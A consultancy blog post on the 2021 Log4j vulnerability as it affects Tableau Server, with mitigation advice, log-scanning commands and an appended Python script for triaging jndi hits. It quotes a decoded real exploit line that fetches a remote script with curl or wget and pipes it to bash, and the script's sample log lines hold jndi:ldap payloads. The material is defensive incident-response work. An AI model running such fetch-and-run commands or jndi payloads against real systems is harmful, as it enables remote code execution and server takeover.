Apache Log4j Vulnerability and Tableau

Jonathan Allenby

The Information Lab will be providing updates to this blog as we continue to work on vulnerability remediation with our customers.

On December 10th, 2021 our SecOps team became aware of a zero-day Java vulnerability in Log4J2 allowing for remote code execution on the host and the potential for loss of control of the system.

Log4J is a Java package used in many software applications for generating log files and is also used by Tableau.

Any software product that runs the Log4J2 package

- The vulnerability condition is disabled by default in version 2.15 and up but is still possible.
- The vulnerability condition is enabled in all versions below 2.15 and must be manually disabled in software code if not patched to version 2.15.

Monitor official announcements from Tableau/Salesforce on this page:

We recommend restricting access to these servers from the internet until a patch is made available by Tableau. Discuss further risks of targeted or chained attacks from within your trusted network with your security operations team. Upgrade your environment as soon as Tableau releases a patch.

We recommend monitoring your network and discussing further risks with your security operations team. Your server could be vulnerable to targeted and chained attacks if an attack can be launched from within your trusted network. Upgrade your environment as soon as Tableau releases a patch.

As Tableau Online is a SaaS solution, we recommend monitoring the official announcements from Tableau/Salesforce on this, as they will take the necessary steps to keep the environment safe.

We recommend upgrading as soon as Tableau releases a patch and being vigilant when opening untrusted workbooks.

We recommend upgrading as soon as Tableau releases a patch and being vigilant when opening untrusted files.

We recommend upgrading as soon as Tableau releases a patch.

Please note that we cannot guarantee that the following commands will find all breaches as the attacks are still evolving, nor can we guarantee that all breaches found are malicious (they might be scans from security tools). Please consult with your security operations team for guidance.

You can scan your Tableau Server logfiles for potential breaches using the following commands:

Windows

```
findstr /S /L /M /I /C:"jndi" "C:\ProgramData\Tableau\Tableau Server\data\tabsvc\logs\*.log"
```

Linux

```
grep 'jndi:' --include '*log' -R /var/opt/tableau/tableau_server/data/tabsvc/logs
```

Responses will look similar to the following:

```
"GET /?x=$ HTTP/1.1"
```

Base64 decoding the string in the above GET request reveals a genuine exploit attempt to get a bash terminal on the server:

```
(curl -s :5874/:80||wget -q -O- :5874/:80)|bash
```

Note: We’ve masked the actual IPs in the above example.

If you find results then we recommend shutting down the server and restoring a safe backup in a new clean environment.

A small number of our internal services were detected as vulnerable and we immediately restricted access until patches become available. We’ve investigated our services to ensure that no malicious action was taken and we haven’t found any indicators. We remain vigilant on our environment as always.

The Information Lab hosts Tableau Server for us on AWS – what actions are you taking?

We have advised all customers with Internet-facing servers to restrict access to those servers via IP whitelisting on the AWS firewall, until a patch becomes available. We have also enabled the AWS WAF mitigation described above. Once a patch is released we will be coordinating an upgrade program with all our hosted customers to migrate them to the new version as soon as possible. We deploy using a blue/green approach, so we will spin up new infrastructure from scratch, restore known-good backups (taken prior to the vulnerability being made public), and decommission the existing infrastructure.

What about The Information Lab Tableau Extensions?

None of the open-source products we offer through our GitHub page, such as Tableau Extensions (KeepitFresh, ExportAll, ImageViewer) or Web Data Connectors, are affected.

The hosting provider we use doesn’t use any Java products for logging.

Tableau will release a maintenance patch with a fix – what can I do to prepare?

When a maintenance release with a fix becomes available, it is important to make sure you’re in a good position to safely deploy the update in your environments.
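The log scan and Base64 decoding step described above can be combined into one triage pass. The following is an added example, not code from the original post or from Tableau: it goes slightly beyond the grep/findstr commands by percent-decoding each line before matching, and the function names, the access-log layout (client address as the first field) and the sample lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Same needle as the grep/findstr commands, matched case-insensitively.
JNDI = re.compile(r"jndi:", re.IGNORECASE)
# Long Base64-looking runs; "/" is left out because it separates URL path segments.
B64_TOKEN = re.compile(r"[A-Za-z0-9+]{16,}={0,2}")


def decode_tokens(text):
    """Return printable ASCII strings recovered from Base64-looking tokens."""
    decoded = []
    for token in B64_TOKEN.findall(text):
        try:
            value = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64, or not text: ignore
        if value.isprintable():
            decoded.append(value)
    return decoded


def triage(lines):
    """Return (line_number, first_field, decoded_strings) for each jndi: hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        text = unquote(line)  # requests may be logged percent-encoded
        match = JNDI.search(text)
        if match is None:
            continue
        source = text.split(" ", 1)[0]  # assumption: client address is the first field
        hits.append((number, source, decode_tokens(text[match.end():])))
    return hits


# Constructed sample lines (documentation IP ranges, harmless payload).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Dec/2021:10:01:02 +0000] "GET /views/Sales HTTP/1.1" 200',
    '203.0.113.9 - - [12/Dec/2021:10:01:05 +0000] "GET /?x=${jndi:ldap://192.0.2.10:1389/a/'
    'ZWNobyBjb25zdHJ1Y3RlZC1zYW1wbGU=} HTTP/1.1" 404',
    '203.0.113.44 - - [12/Dec/2021:10:02:11 +0000] "GET /?q=%24%7BJNDI:ldap://192.0.2.20/probe%7D HTTP/1.1" 404',
]

if __name__ == "__main__":
    for number, source, strings in triage(SAMPLE_LOG):
        print(f"line {number} from {source}: decoded={strings or 'nothing decodable'}")
```

A hit with a decoded command string is a stronger signal than a bare `jndi:` match, but as the post notes, neither a hit nor its absence is conclusive on its own.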